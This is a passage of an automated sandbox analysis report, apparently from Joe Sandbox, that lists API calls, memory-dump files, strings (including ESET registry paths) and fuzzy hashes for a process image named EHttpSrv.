                                                                                                                • #5803.MFC80U(00000413,?,00000001), ref: 204594CC
                                                                                                                • #578.MFC80U(00000413,?,00000001), ref: 204594DD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026#578#5803#6232
                                                                                                                • String ID:
                                                                                                                • API String ID: 1453617869-0
                                                                                                                • Opcode ID: f86256a3efc04a42eacee18c2d2bea885fb2b4719f2c3ecb3668a5cd64f5898e
                                                                                                                • Instruction ID: 9bd44db928dee0b38f906c4aee4a3c82d3db633600cc66f3fe952941ce938208
                                                                                                                • Opcode Fuzzy Hash: f86256a3efc04a42eacee18c2d2bea885fb2b4719f2c3ecb3668a5cd64f5898e
                                                                                                                • Instruction Fuzzy Hash: 500157B5108A00ABD304DF54C985B9BBBE4FB84B18F008A1DF452966D0DB799908CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • wcsncmp.MSVCR80 ref: 2042E8DB
                                                                                                                • wcsncmp.MSVCR80 ref: 2042E908
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsncmp$wcscpy_s
                                                                                                                • String ID: HKCU\$HKLM\
                                                                                                                • API String ID: 2575004286-2581276437
                                                                                                                • Opcode ID: 05a45e9ad9c39bae23c1861ea01fe15063871978b02da57fcb3f0cf2ca2bab6a
                                                                                                                • Instruction ID: 9477c974d03e298546535f001272ddac06e554d7a7f1493319765a10b8f416ab
                                                                                                                • Opcode Fuzzy Hash: 05a45e9ad9c39bae23c1861ea01fe15063871978b02da57fcb3f0cf2ca2bab6a
                                                                                                                • Instruction Fuzzy Hash: 07919EB1A00648DFCB14CF95E880BEEB7B1BF48308F54C169ED156B386D7389A45CBA5
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20455983
                                                                                                                • #6232.MFC80U(00000001,00000000,FEEA6C22), ref: 20455991
                                                                                                                • #6751.MFC80U(00000000,00000001), ref: 20455B32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #314#6232#6751
                                                                                                                • String ID: DetectAppChanging
                                                                                                                • API String ID: 2722654210-2516610685
                                                                                                                • Opcode ID: b7f6271265944db94faaadf3a698083846833aab4ebac0db9ee8707db7b2ab85
                                                                                                                • Instruction ID: 9ed9b2dda144238cdeb4c173259532dea9aa329e793ebb0550c710b0c65b3c42
                                                                                                                • Opcode Fuzzy Hash: b7f6271265944db94faaadf3a698083846833aab4ebac0db9ee8707db7b2ab85
                                                                                                                • Instruction Fuzzy Hash: C6517E715087418FC314CFA8C5D1AABFBE1FB94754F108A2EF29A87291D738E849CB12
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043A150: free.MSVCR80 ref: 2043A164
                                                                                                                  • Part of subcall function 2043A150: malloc.MSVCR80 ref: 2043A18A
                                                                                                                  • Part of subcall function 2043A150: memcpy.MSVCR80(?,?,?), ref: 2043A1A9
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,FEEA6C22), ref: 2043EB30
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,FEEA6C22), ref: 2043EBC2
                                                                                                                • #1176.MFC80U(?,FEEA6C22), ref: 2043EC2F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$#1176EnterLeavefreemallocmemcpy
                                                                                                                • String ID: gfff
                                                                                                                • API String ID: 4100045392-1553575800
                                                                                                                • Opcode ID: 64efc84ac7f6c0c395452fcad5ca3549b208dd17e4628c0b1fb12a9484cd8484
                                                                                                                • Instruction ID: bfe25518644de768d182e323753ab60f9fc9b9fc0b8f3c8177bbc63c303b0321
                                                                                                                • Opcode Fuzzy Hash: 64efc84ac7f6c0c395452fcad5ca3549b208dd17e4628c0b1fb12a9484cd8484
                                                                                                                • Instruction Fuzzy Hash: 2E41D0712087858FD705CFAAC880B8BB7E5AF88714F14CA1CE89687391D738F945CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: <
                                                                                                                • API String ID: 4009619764-3887346652
                                                                                                                • Opcode ID: e04a5b232591d9ffbf860a7328188433d2a46c3e7e538cd84ba0cecbcb35da20
                                                                                                                • Instruction ID: d6ccd733044bd11b1b099a1abc239f885c02b4958a0f254662bc588efb38c9b5
                                                                                                                • Opcode Fuzzy Hash: e04a5b232591d9ffbf860a7328188433d2a46c3e7e538cd84ba0cecbcb35da20
                                                                                                                • Instruction Fuzzy Hash: E33148B2A0423147CB183B5CEC8079A73F0DF95325F198169EF01DF38AE678AD4296D5
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 20417F25
                                                                                                                • _snwprintf_s.MSVCR80 ref: 20417F59
                                                                                                                • #1176.MFC80U(?,?,?,20413EEB,00000002,?), ref: 20417F80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#1176
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                • API String ID: 2565221431-3491811756
                                                                                                                • Opcode ID: 1b96df800e304920a0115d2cb6ad1b36057cacb305216eed5eef70d8304d5a87
                                                                                                                • Instruction ID: e6bc5996723d5b37b73d512024ffb5d4e11874207e31cf63148c0156e5b1bce3
                                                                                                                • Opcode Fuzzy Hash: 1b96df800e304920a0115d2cb6ad1b36057cacb305216eed5eef70d8304d5a87
                                                                                                                • Instruction Fuzzy Hash: 2B2120311086509ED364CB95CC80E37F7F9ABC9608F09C88DF8A40B2A6D239F9468B20
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$#2310
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                • API String ID: 921588996-3491811756
                                                                                                                • Opcode ID: 5fb0a209fa81a561125ac6c09dff1d6614aed634006b3f9d46bfa7fd8e06037a
                                                                                                                • Instruction ID: b1c32227e64822f16640b2784a13768f6d212c5f5b3873dce6694a974748ca9a
                                                                                                                • Opcode Fuzzy Hash: 5fb0a209fa81a561125ac6c09dff1d6614aed634006b3f9d46bfa7fd8e06037a
                                                                                                                • Instruction Fuzzy Hash: 7D1104B11083106BC304CB698C90EBBF7E9ABD8301F408E1EF9D1922D1D679E524DB72
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20406540: wcscpy_s.MSVCR80 ref: 204066C2
                                                                                                                  • Part of subcall function 20406540: wcschr.MSVCR80 ref: 204066EB
                                                                                                                • _snwprintf_s.MSVCR80 ref: 204062D8
                                                                                                                • wcschr.MSVCR80 ref: 20406304
                                                                                                                • _snwprintf_s.MSVCR80 ref: 20406322
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_swcschr$wcscpy_s
                                                                                                                • String ID: %%%d
                                                                                                                • API String ID: 1759257516-704803261
                                                                                                                • Opcode ID: e7371da27c0bddc6dcdb050928b916e4e307d7d8195393fa1b92d13a1548eea4
                                                                                                                • Instruction ID: 522c5e4176b67f78ba8be082eb7b4f6369f96635ae9f8aa8f9e4ab9c953b70f6
                                                                                                                • Opcode Fuzzy Hash: e7371da27c0bddc6dcdb050928b916e4e307d7d8195393fa1b92d13a1548eea4
                                                                                                                • Instruction Fuzzy Hash: F2114C312006296BC714AF5C9D88D7F776AEB80315B458B3DFD51A32C4C725FD1986B0
                                                                                                                APIs
                                                                                                                • _snwprintf_s.MSVCR80 ref: 20406202
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • wcschr.MSVCR80 ref: 2040622D
                                                                                                                • _snwprintf_s.MSVCR80 ref: 20406247
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_s$wcschrwcscpy_s
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                • API String ID: 584907567-3491811756
                                                                                                                • Opcode ID: cf1b214b1a40a5629e9223c01a41b2366a36f0f5e33a4f3ec048d969d7ad2733
                                                                                                                • Instruction ID: 62284f0cb5b1c6d56f04d6346a0236fee5cd40c6f8b159ead40cda12a97532b1
                                                                                                                • Opcode Fuzzy Hash: cf1b214b1a40a5629e9223c01a41b2366a36f0f5e33a4f3ec048d969d7ad2733
                                                                                                                • Instruction Fuzzy Hash: FF114C725046387787212F5D4D84CBF3BADDAC4725B44C619FE94672C4C5387E118BB4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C340: #356.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF,2047EBCB,000000FF,204402AC,0000000B,FEEA6C22,00000000,00000000,00000104,2047FA81,000000FF,20445D01), ref: 2042C369
                                                                                                                  • Part of subcall function 2042C340: #310.MFC80U(FEEA6C22,00000000,0000000B,?,000000FF), ref: 2042C3B1
                                                                                                                  • Part of subcall function 2042C340: #563.MFC80U(?,000000FF), ref: 2042C3C2
                                                                                                                • #6735.MFC80U ref: 204402E6
                                                                                                                  • Part of subcall function 20424700: #572.MFC80U(FEEA6C22,000000FF,00000000,2047A038,000000FF,20425F90,0000017F,000000FF,2047B3D6,FEEA6C22,?,?,?,2047B3D6,000000FF,20428C79), ref: 20424727
                                                                                                                • #6735.MFC80U(20485878,0000011F), ref: 2044030D
                                                                                                                • #6735.MFC80U(20485878), ref: 20440323
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6735$#310#356#563#572
                                                                                                                • String ID: 4H
                                                                                                                • API String ID: 3660135715-267674204
                                                                                                                • Opcode ID: 207525e7d9b9a88def6f2e2f9cce33c0383f00cf5ba607997c4762eb9fcf0969
                                                                                                                • Instruction ID: 363adbb328d852d6b09fcd62fbcb88f34514aa4ee2b8565f9c1794eb3b7c0308
                                                                                                                • Opcode Fuzzy Hash: 207525e7d9b9a88def6f2e2f9cce33c0383f00cf5ba607997c4762eb9fcf0969
                                                                                                                • Instruction Fuzzy Hash: 34212971409B419FD321CF64ED84BD7FBE4FB59714F408D2EE4A682280CB79A508CBA2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000002,-00000002,?,2043C1B7), ref: 2043BD4F
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: 4~H $ProductVersion$Software\ESET\ESET Security\CurrentVersion\Info
                                                                                                                • API String ID: 3677997916-3933421762
                                                                                                                • Opcode ID: afc6a44b089bdcb016b5a6ef78c43ae4238845301192c1b7bdd1c23f2bd2b367
                                                                                                                • Instruction ID: 914dfda0ce83377511228f51b07b4ab881ac781a6ba4cd484d9ae1c21c81ffde
                                                                                                                • Opcode Fuzzy Hash: afc6a44b089bdcb016b5a6ef78c43ae4238845301192c1b7bdd1c23f2bd2b367
                                                                                                                • Instruction Fuzzy Hash: 60F0F6220442196AD3106BD5AC42F77B7ECDF15689F30D41DBA5486141EFBD9C5095E2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043D210: RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCloseKey.ADVAPI32(?,-00000002,?,2043C0B9,00000105), ref: 2043BDCE
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: ProductName$Software\ESET\ESET Security\CurrentVersion\Info$T~H
                                                                                                                • API String ID: 3677997916-2656945498
                                                                                                                • Opcode ID: 1b30e3a84631aab0c4b7d4b110c5badaf1cd747ca1323e0ffffa4887a791e24d
                                                                                                                • Instruction ID: 65d34e742e52f4b2defbbd06fcf1642087ee4278305361be0e027dd8d7bc9dbd
                                                                                                                • Opcode Fuzzy Hash: 1b30e3a84631aab0c4b7d4b110c5badaf1cd747ca1323e0ffffa4887a791e24d
                                                                                                                • Instruction Fuzzy Hash: D3F0C262044319AAD310AFD0EC82F6BB7E8EF55648F20E81DBA4542541EB7C9C549692
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(00000000,?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D766
                                                                                                                • #1058.MFC80U(?,GIF), ref: 2043D77A
                                                                                                                • #1058.MFC80U(?,GIF,00000000,?,?,20472692,0000024F), ref: 2043D790
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1058$FindResource
                                                                                                                • String ID: GIF
                                                                                                                • API String ID: 2438790252-881873598
                                                                                                                • Opcode ID: 9eb4c446ac0929af3a9cd147b67188f7ef94327fbaa61bebdc1786359fc39285
                                                                                                                • Instruction ID: a20db0469bcc12d11d5da9d1ad7551215c0c58e1f7aa44d32378eaca37f11d3e
                                                                                                                • Opcode Fuzzy Hash: 9eb4c446ac0929af3a9cd147b67188f7ef94327fbaa61bebdc1786359fc39285
                                                                                                                • Instruction Fuzzy Hash: E3F0A7729005297A81105BD9AC90A9F7B5EDA865ADB50C039FD4C82227F72DDC018FA1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00079081,20499408), ref: 20439080
                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Function_00079081,20499408), ref: 20439091
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Replace), ref: 204390AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Replace
                                                                                                                • API String ID: 310444273-3096891558
                                                                                                                • Opcode ID: 52852995afb5886327d2e362851438bf7aba3aee773e5fa7b5c832c119c7e6ea
                                                                                                                • Instruction ID: 64b91df37241fb0394471559f0806e23743298c2429490576642b568fbc93b1b
                                                                                                                • Opcode Fuzzy Hash: 52852995afb5886327d2e362851438bf7aba3aee773e5fa7b5c832c119c7e6ea
                                                                                                                • Instruction Fuzzy Hash: 31F07F75A05B019FC724CFA9D988B02BBF8BB48A15B10DC2DE5DAC3A11DB39E940DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,20435186,?,?), ref: 20435220
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435231
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Add), ref: 2043524B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
